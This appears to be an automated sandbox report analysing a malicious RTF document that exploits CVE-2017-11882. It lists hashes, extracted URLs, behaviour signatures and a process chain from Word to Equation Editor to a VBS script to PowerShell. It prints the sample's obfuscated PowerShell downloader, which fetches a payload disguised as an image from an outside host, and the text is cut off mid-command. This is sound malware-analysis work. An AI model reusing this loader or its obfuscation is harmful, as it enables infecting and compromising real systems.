Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
21-08-2024 12:20
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Exploit.CVE-2017-11882.123.25336.18229.rtf
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Exploit.CVE-2017-11882.123.25336.18229.rtf
Resource
win10v2004-20240802-en
General
-
Target
SecuriteInfo.com.Exploit.CVE-2017-11882.123.25336.18229.rtf
-
Size
87KB
-
MD5
7d3b215b98532e8570e22f353da4223e
-
SHA1
004b80efe852e998a9ec7c67cf524d5abb660d1c
-
SHA256
098bfe7ab9c2ca61fc488b0e9751adc098330485b49023852a3fcccace8a227f
-
SHA512
49f9ef28d030c16cf5035f4a9fadecb385e37603093b3d6c6a871b8dcab3f23ae068e1f19fd38b8a62946eaf77cff8fd8f428a73fb7e90f09b74a64a9d8f0f64
-
SSDEEP
384:TyfLh3m+7oZ5xgLn4LwP/sluJJxoMTtPNmZYjCYnXPKl:2fLtm+I7AzD1mOCYnfKl
Malware Config
Extracted
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
EQNEDT32.EXEpowershell.exeflow pid Process 3 2808 EQNEDT32.EXE 7 660 powershell.exe 8 660 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid Process 2620 powershell.exe 660 powershell.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exeWINWORD.EXEEQNEDT32.EXEWScript.exepowershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid Process 1620 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid Process 2620 powershell.exe 660 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2620 powershell.exe Token: SeDebugPrivilege 660 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid Process 1620 WINWORD.EXE 1620 WINWORD.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
EQNEDT32.EXEWScript.exepowershell.exeWINWORD.EXEdescription pid Process procid_target PID 2808 wrote to memory of 2944 2808 EQNEDT32.EXE 31 PID 2808 wrote to memory of 2944 2808 EQNEDT32.EXE 31 PID 2808 wrote to memory of 2944 2808 EQNEDT32.EXE 31 PID 2808 wrote to memory of 2944 2808 EQNEDT32.EXE 31 PID 2944 wrote to memory of 2620 2944 WScript.exe 33 PID 2944 wrote to memory of 2620 2944 WScript.exe 33 PID 2944 wrote to memory of 2620 2944 WScript.exe 33 PID 2944 wrote to memory of 2620 2944 WScript.exe 33 PID 2620 wrote to memory of 660 2620 powershell.exe 35 PID 2620 wrote to memory of 660 2620 powershell.exe 35 PID 2620 wrote to memory of 660 2620 powershell.exe 35 PID 2620 wrote to memory of 660 2620 powershell.exe 35 PID 1620 wrote to memory of 2524 1620 WINWORD.EXE 36 PID 1620 wrote to memory of 2524 1620 WINWORD.EXE 36 PID 1620 wrote to memory of 2524 1620 WINWORD.EXE 36 PID 1620 wrote to memory of 2524 1620 WINWORD.EXE 36
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.CVE-2017-11882.123.25336.18229.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2524
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\niceworkofyummybutterbu.vBS"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔YQBn⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔VQBy⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔9⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔JwBo⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bw⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔Og⤖ ䷮ ⫗ ⫁ ⺔v⤖ ䷮ ⫗ ⫁ ⺔C8⤖ ䷮ ⫗ ⫁ ⺔aQBh⤖ ䷮ ⫗ ⫁ ⺔Dg⤖ ䷮ ⫗ ⫁ ⺔M⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔z⤖ ䷮ ⫗ ⫁ ⺔DE⤖ ䷮ ⫗ ⫁ ⺔M⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔0⤖ ䷮ ⫗ ⫁ ⺔C4⤖ ䷮ ⫗ ⫁ ⺔dQBz⤖ ䷮ ⫗ ⫁ ⺔C4⤖ ䷮ ⫗ ⫁ ⺔YQBy⤖ ䷮ ⫗ ⫁ ⺔GM⤖ ䷮ ⫗ ⫁ ⺔a⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔HY⤖ ䷮ ⫗ ⫁ ⺔ZQ⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔G8⤖ ䷮ ⫗ ⫁ ⺔cgBn⤖ ䷮ ⫗ ⫁ ⺔C8⤖ ䷮ ⫗ ⫁ ⺔Mg⤖ ䷮ ⫗ ⫁ ⺔3⤖ ䷮ ⫗ ⫁ ⺔C8⤖ ䷮ ⫗ ⫁ ⺔aQB0⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔bQBz⤖ ䷮ ⫗ ⫁ ⺔C8⤖ ䷮ ⫗ ⫁ ⺔dgBi⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔Xw⤖ ䷮ ⫗ ⫁ ⺔y⤖ ䷮ ⫗ ⫁ ⺔D⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔Mg⤖ ䷮ ⫗ ⫁ ⺔0⤖ ䷮ ⫗ ⫁ ⺔D⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔Nw⤖ ䷮ ⫗ ⫁ ⺔y⤖ ䷮ ⫗ ⫁ ⺔DY⤖ ䷮ ⫗ ⫁ ⺔Xw⤖ ䷮ ⫗ ⫁ ⺔y⤖ ䷮ ⫗ ⫁ ⺔D⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔Mg⤖ ䷮ ⫗ ⫁ ⺔0⤖ ䷮ ⫗ ⫁ ⺔D⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔Nw⤖ ䷮ ⫗ ⫁ ⺔y⤖ ䷮ ⫗ ⫁ ⺔DY⤖ ䷮ ⫗ ⫁ ⺔LwB2⤖ ䷮ ⫗ ⫁ ⺔GI⤖ ䷮ ⫗ ⫁ ⺔cw⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔Go⤖ ䷮ ⫗ ⫁ ⺔c⤖ ䷮ ⫗ ⫁ ⺔Bn⤖ ䷮ ⫗ ⫁ ⺔Cc⤖ ䷮ ⫗ ⫁ ⺔Ow⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔Hc⤖ ䷮ ⫗ ⫁ ⺔ZQBi⤖ ䷮ ⫗ ⫁ ⺔EM⤖ ䷮ ⫗ ⫁ ⺔b⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔bgB0⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔PQ⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔E4⤖ ䷮ ⫗ ⫁ ⺔ZQB3⤖ ䷮ ⫗ ⫁ ⺔C0⤖ ䷮ ⫗ ⫁ ⺔TwBi⤖ ䷮ ⫗ ⫁ ⺔Go⤖ ䷮ ⫗ ⫁ ⺔ZQBj⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔BT⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔cwB0⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔bQ⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔E4⤖ ䷮ ⫗ ⫁ ⺔ZQB0⤖ ䷮ ⫗ ⫁ ⺔C4⤖ ䷮ ⫗ ⫁ ⺔VwBl⤖ ䷮ ⫗ ⫁ ⺔GI⤖ ䷮ ⫗ ⫁ ⺔QwBs⤖ ䷮ ⫗ ⫁ ⺔Gk⤖ ䷮ ⫗ ⫁ ⺔ZQBu⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔Ow⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔Gk⤖ ䷮ ⫗ ⫁ ⺔bQBh⤖ ䷮ ⫗ ⫁ ⺔Gc⤖ ䷮ ⫗ ⫁ ⺔ZQBC⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔9⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔J⤖ ䷮ ⫗ ⫁ ⺔B3⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔YgBD⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔aQBl⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔EQ⤖ ䷮ ⫗ ⫁ ⺔bwB3⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔b⤖ ䷮ ⫗ ⫁ ⺔Bv⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔BE⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bh⤖ ䷮ ⫗ ⫁ ⺔Cg⤖ ䷮ ⫗ ⫁ ⺔J⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔YQBn⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔VQBy⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔KQ⤖ ䷮ ⫗ ⫁ ⺔7⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔aQBt⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔ZwBl⤖ ䷮ ⫗ ⫁ ⺔FQ⤖ ䷮ ⫗ ⫁ ⺔ZQB4⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔9⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔WwBT⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔cwB0⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔bQ⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔FQ⤖ ䷮ ⫗ ⫁ ⺔ZQB4⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔LgBF⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔YwBv⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔aQBu⤖ ䷮ ⫗ ⫁ ⺔Gc⤖ ䷮ ⫗ ⫁ ⺔XQ⤖ ䷮ ⫗ ⫁ ⺔6⤖ ䷮ ⫗ ⫁ ⺔Do⤖ ䷮ ⫗ ⫁ ⺔VQBU⤖ ䷮ ⫗ ⫁ ⺔EY⤖ ䷮ ⫗ ⫁ ⺔O⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔Ec⤖ ䷮ ⫗ ⫁ ⺔ZQB0⤖ ䷮ ⫗ ⫁ ⺔FM⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔By⤖ ䷮ ⫗ ⫁ ⺔Gk⤖ ䷮ ⫗ ⫁ ⺔bgBn⤖ ䷮ ⫗ ⫁ ⺔Cg⤖ ䷮ ⫗ ⫁ ⺔J⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔YQBn⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔QgB5⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔ZQBz⤖ ䷮ ⫗ ⫁ ⺔Ck⤖ ䷮ ⫗ ⫁ ⺔Ow⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bh⤖ ䷮ ⫗ ⫁ ⺔HI⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔BG⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔YQBn⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔PQ⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔Cc⤖ ䷮ ⫗ ⫁ ⺔P⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔8⤖ ䷮ ⫗ ⫁ ⺔EI⤖ ䷮ ⫗ ⫁ ⺔QQBT⤖ ䷮ ⫗ ⫁ ⺔EU⤖ ䷮ ⫗ ⫁ ⺔Ng⤖ ䷮ ⫗ ⫁ ⺔0⤖ ䷮ ⫗ ⫁ ⺔F8⤖ ䷮ ⫗ ⫁ ⺔UwBU⤖ ䷮ ⫗ ⫁ ⺔EE⤖ ䷮ ⫗ ⫁ ⺔UgBU⤖ ䷮ ⫗ ⫁ ⺔D4⤖ ䷮ ⫗ ⫁ ⺔Pg⤖ ䷮ ⫗ ⫁ ⺔n⤖ ䷮ ⫗ ⫁ ⺔Ds⤖ ䷮ ⫗ ⫁ ⺔J⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔BG⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔YQBn⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔PQ⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔Cc⤖ ䷮ ⫗ ⫁ ⺔P⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔8⤖ ䷮ ⫗ ⫁ ⺔EI⤖ ䷮ ⫗ ⫁ ⺔QQBT⤖ ䷮ ⫗ ⫁ ⺔EU⤖ ䷮ ⫗ ⫁ ⺔Ng⤖ ䷮ ⫗ ⫁ ⺔0⤖ ䷮ ⫗ ⫁ ⺔F8⤖ ䷮ ⫗ ⫁ ⺔RQBO⤖ ䷮ ⫗ ⫁ ⺔EQ⤖ ䷮ ⫗ ⫁ ⺔Pg⤖ ䷮ ⫗ ⫁ ⺔+⤖ ䷮ ⫗ ⫁ ⺔Cc⤖ ䷮ ⫗ ⫁ ⺔Ow⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bh⤖ ䷮ ⫗ ⫁ ⺔HI⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔BJ⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔Hg⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔9⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔J⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔YQBn⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔V⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔Hg⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔Ek⤖ ䷮ ⫗ ⫁ ⺔bgBk⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔e⤖ ䷮ ⫗ ⫁ ⺔BP⤖ ䷮ ⫗ ⫁ ⺔GY⤖ ䷮ ⫗ ⫁ ⺔K⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bh⤖ ䷮ ⫗ ⫁ ⺔HI⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔BG⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔YQBn⤖ ䷮ ⫗ ⫁ ⺔Ck⤖ ䷮ ⫗ ⫁ ⺔Ow⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔bgBk⤖ ䷮ ⫗ ⫁ ⺔Ek⤖ ䷮ ⫗ ⫁ ⺔bgBk⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔e⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔D0⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔Gk⤖ ䷮ ⫗ ⫁ ⺔bQBh⤖ ䷮ ⫗ ⫁ ⺔Gc⤖ ䷮ ⫗ ⫁ ⺔ZQBU⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔e⤖ ䷮ ⫗ ⫁ ⺔B0⤖ ䷮ ⫗ ⫁ ⺔C4⤖ ䷮ ⫗ ⫁ ⺔SQBu⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔ZQB4⤖ ䷮ ⫗ ⫁ ⺔E8⤖ ䷮ ⫗ ⫁ ⺔Zg⤖ ䷮ ⫗ ⫁ ⺔o⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔ZQBu⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔RgBs⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔Zw⤖ ䷮ ⫗ ⫁ ⺔p⤖ ䷮ ⫗ ⫁ ⺔Ds⤖ ䷮ ⫗ ⫁ ⺔J⤖ ䷮ ⫗ ⫁ ⺔Bz⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔YQBy⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔SQBu⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔ZQB4⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔LQBn⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔w⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔LQBh⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔ZQBu⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔SQBu⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔ZQB4⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔LQBn⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bh⤖ ䷮ ⫗ ⫁ ⺔HI⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔BJ⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔Hg⤖ ䷮ ⫗ ⫁ ⺔Ow⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bh⤖ ䷮ ⫗ ⫁ ⺔HI⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔BJ⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔Hg⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔r⤖ ䷮ ⫗ ⫁ ⺔D0⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bh⤖ ䷮ ⫗ ⫁ ⺔HI⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔BG⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔YQBn⤖ ䷮ ⫗ ⫁ ⺔C4⤖ ䷮ ⫗ ⫁ ⺔T⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔ZwB0⤖ ䷮ ⫗ ⫁ ⺔Gg⤖ ䷮ ⫗ ⫁ ⺔Ow⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔GI⤖ ䷮ ⫗ ⫁ ⺔YQBz⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔Ng⤖ ䷮ ⫗ ⫁ ⺔0⤖ ䷮ ⫗ ⫁ ⺔Ew⤖ ䷮ ⫗ ⫁ ⺔ZQBu⤖ ䷮ ⫗ ⫁ ⺔Gc⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bo⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔PQ⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔ZQBu⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔SQBu⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔ZQB4⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔LQ⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔cwB0⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔cgB0⤖ ䷮ ⫗ ⫁ ⺔Ek⤖ ䷮ ⫗ ⫁ ⺔bgBk⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔e⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔7⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔YgBh⤖ ䷮ ⫗ ⫁ 